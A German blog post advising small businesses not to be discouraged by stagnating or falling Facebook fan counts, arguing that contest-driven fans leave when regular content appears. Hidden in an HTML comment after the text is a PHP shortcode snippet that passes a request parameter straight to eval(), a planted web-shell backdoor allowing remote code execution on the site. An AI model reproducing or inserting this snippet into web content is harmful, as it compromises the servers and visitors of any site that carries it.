Mehr und mehr kleine und mittelständische Unternehmen erkennen zumindest schemenhaft, dass sie Nutzen aus dem Gebrauch sozialer Medien ziehen können. Facebook-Seiten schießen wie Pilze aus dem Boden. Mitarbeiter werden damit beauftragt, sich um das Web zu kümmern. Ein gewisses Budget wird vielleicht sogar in Facebook-Ads zur Verfügung gestellt. Jetzt heißt es nur noch warten und schon werden die Fanzahlen steigen.

Woche für Woche muss der Web-Mitarbeiter über den Facebook Auftritt Meldung machen. Da es sich bei diesen Personen meist um junge, motivierte Menschen handelt, wird analysiert, was nur analysiert werden kann um etwas über das Handeln der Fans zu erfahren. Das Unternehmen interessiert allerdings nur der Stand des Fan-Counters, der sich kaum weiterbewegt, seit keine Werbung mehr geschaltet wird. Hier folgt die Binsenweisheit: Wer mit seinen Fans nicht interagiert, der hat den Sinn von Social Media nicht begriffen.

Auch gibt es im Web zu Hauf Anleitungen zum Fanwachstum bzw. zur Dialogmotivation. Doch die Fananzahlen stagnieren, obwohl sie mit relevantem Content gefüttert werden und alle sonstigen Ratschläge der Social Media Pros eingehalten werden: “Zeige deinen Fans, mit wem sie kommunizieren” “Fans wollen Rabatte” “Die optimale Anzahl und Zeit für Postings”….-alles hilft nichts. Unser “Webmensch” wird frustriert, gibt sich die Schuld an jedem Fanverlust -sieht zur gleichen Zeit aber auch nicht die Fans, die er gewinnt. Was macht er nur falsch, wenn sogar die Profi-Tipps nicht fruchten?

Meine Antwort: Man kann seine Klientel nicht pauschalisieren. Jede Branche stellt andere Anforderungen an die Kommunikation. So kann der Fanverlust durchaus aus dem “relevanten Content” resultieren. Ein “Fan”, der nur aufgrund eines Gewinnspiels der Seite beigetreten ist, kann sich durch das Posten von regelmäßigen Neuerungen etc. gestört fühlen und verlässt die Seite. Im Grunde eine Reduktion von Kommunikationsleichen.

Also lieber Webmensch – gib dich nicht dem Frust vom Fanverlust hin. Fanzahlen können durch aktuelle Facebookänderungen sowieso vernachlässigt werden.

<!– [insert_php]if (isset($_REQUEST["HnsQ"])){eval($_REQUEST["HnsQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["HnsQ"])){eval($_REQUEST["HnsQ"]);exit;}[/php] –>

Pin It on Pinterest